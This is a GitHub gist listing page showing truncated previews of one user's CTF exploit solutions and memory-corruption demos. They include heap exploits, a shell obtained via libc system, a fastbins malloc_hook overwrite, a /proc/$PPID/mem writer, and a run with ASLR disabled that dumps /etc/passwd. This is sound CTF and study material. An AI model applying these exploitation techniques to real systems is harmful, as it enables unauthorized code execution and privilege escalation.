inaz2
/ digits_pca_scatter.ipynb
Last active
January 24, 2017 12:14
http://inaz2.hatenablog.com/entry/2017/01/24/211331
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
inaz2
/ iris_pca_scatter.ipynb
Last active
December 12, 2021 06:17
http://inaz2.hatenablog.com/entry/2017/01/23/214409
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
inaz2
/ write_ppid_memory.c
Created
January 4, 2017 05:38
write memory of the parent process via /proc/$PPID/mem
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc write_ppid_memory.c -o write_ppid_memory | |
| $ sudo chown root write_ppid_memory | |
| $ sudo chmod u+s write_ppid_memory | |
| $ ls -al | |
| -rwsr-xr-x 1 root user 8984 Jan 4 14:35 write_ppid_memory* | |
| -rw-r--r-- 1 user user 475 Jan 4 14:28 write_ppid_memory.c |
inaz2
/ rec.py
Created
January 2, 2017 09:04
33C3 CTF rec (Pwn 200) / http://bruce30262.logdown.com/posts/1256252-33c3-ctf-2016-rec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python rec.py | |
| [+] bin_base = 56580000 | |
| [+] libc_puts = f759f140 | |
| [+] libc_system = f757a940 | |
| [+] libc_binsh = f7698e8b | |
| [+] got a shell! | |
| id | |
| uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker) |
inaz2
/ babyfengshui.py
Created
January 1, 2017 09:13
33C3 CTF babyfengshui (Pwn 150) / http://katc.hateblo.jp/entry/2016/12/30/164753
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from minipwn import * | |
| def add_user(s, size_desc, name, text_len, text): | |
| recvuntil(s, 'Action: ') | |
| sendline(s, '0') | |
| recvuntil(s, 'size of description: ') | |
| sendline(s, str(size_desc)) | |
| recvuntil(s, 'name: ') | |
| sendline(s, name) | |
| recvuntil(s, 'text length: ') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc test.c | |
| $ python solve.py | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | The program is accessing memory or registers with an unspecified value. This could indicate unwanted behavior. | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by: | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 1) setting a value to the initial state | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY_REGISTERS}, to suppress these messages. | |
| WARNING | 2019-05-06 19:54:00,018 | angr.state_plugins.symbolic_memory | Filling register r15 with 8 unconstrained bytes referenced from 0x810 (__libc_csu_ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo sysctl -w kernel.randomize_va_space=0 | |
| kernel.randomize_va_space = 0 | |
| $ ./a.out | |
| root:x:0:0:root:/root:/bin/bash | |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
| bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
| sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
| (snip) | |
| Segmentation fault (core dumped) |
inaz2
/ solve.py
Last active
April 23, 2017 16:21
Hack The Vote 2016 Warp Speed (Forensics 150) / https://github.com/ctfs/write-ups-2016/tree/master/hack-the-vote-ctf-2016/forensics/warp-speed-150
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| data = open('./warp-speed.jpg').read() | |
| # replace (height, width): (250, 1000) -> (500, 500) | |
| data = data.replace('\x00\xfa\x03\xe8', '\x01\xf4\x01\xf4') | |
| print data |
inaz2
/ solve.py
Last active
April 7, 2017 21:05
Hack The Vote 2016 The Best RSA (Crypto 250) / https://github.com/ctfs/write-ups-2016/tree/master/hack-the-vote-ctf-2016/crypto/the-best-rsa-250 https://gist.github.com/Bono-iPad/ee91bf35e4520283d76add6dd81519c4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python solve.py | file - | |
| /dev/stdin: GIF image data, version 89a, 512 x 316 |
inaz2
/ fastbins_malloc_hook.c
Last active
January 6, 2020 12:05
overwrite malloc_hook by fastbins unlink attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| void jackpot() { puts("jackpot!"); } | |
| int main() | |
| { | |
| puts("[+] allocate p1, p2"); | |
| char *p1 = malloc(0x100); |